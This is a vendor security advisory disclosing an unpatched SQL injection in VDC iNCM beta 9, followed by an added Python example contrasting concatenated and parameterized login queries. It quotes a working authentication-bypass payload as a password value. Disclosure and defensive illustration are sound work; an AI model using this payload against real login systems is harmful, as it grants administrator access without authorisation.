Title: | SQL injection in VDC iNCM |
---|---|
Severity: | Critical |
Reporter: | Blue Moon Consulting |
Products: | VDC iNCM beta 9 |
Fixed in: | -- |
VDC iNCM contains an SQL injection vulnerability. This allows an attacker to log in as an Administrator without knowing the account's password.
There is no workaround.
There is no fix at the moment. Customers are advised to contact the vendor directly for a proper fix.
Blue Moon Consulting adapts RFPolicy v2.0 in notifying vendors.

Initial vendor contact: | May 20, 2008 |
---|---|
Vendor response: | -- |
Public disclosure: | May 27, 2008 |
Exploit code: | When logging in, use any username with this password: `' or type=1 and username='Admin` |

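
The password string above only has an effect when the login query is assembled by concatenating user input into the SQL text. The following Python/sqlite3 code is an added example, not code from VDC iNCM or from this advisory; it runs that string through a concatenated query and through a parameterized one. The `users` table, its `password` column, the sample rows and the function names are assumptions; only the `type` and `username` column names come from the string quoted above.

```python
import sqlite3

# Constructed schema: only the `type` and `username` column names appear in the
# advisory; the table name, `password` column and rows are assumptions.
# Plaintext passwords are used only to keep the example short.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, type INTEGER)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("Admin", "s3cret-admin", 1), ("alice", "alice-pw", 0)],
    )
    return db

def login_concatenated(db, username, password):
    """Assumed vulnerable pattern: user input is pasted into the SQL text."""
    sql = (
        "SELECT username, type FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    # With the advisory's string the WHERE clause parses as
    #   (username='..' AND password='') OR (type=1 AND username='Admin')
    # because AND binds tighter than OR.
    return db.execute(sql).fetchone()

def login_parameterized(db, username, password):
    """Hardened form: values are bound, so quotes inside them stay data."""
    sql = "SELECT username, type FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()

# Password string quoted in the advisory.
ADVISORY_PASSWORD = "' or type=1 and username='Admin"

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", login_concatenated(db, "anyone", ADVISORY_PASSWORD))
    print("parameterized:", login_parameterized(db, "anyone", ADVISORY_PASSWORD))
    print("valid login  :", login_parameterized(db, "Admin", "s3cret-admin"))
```

The concatenated query returns the Admin row for any username, while the parameterized query returns no row for the same input and still accepts the real credentials.
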
The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.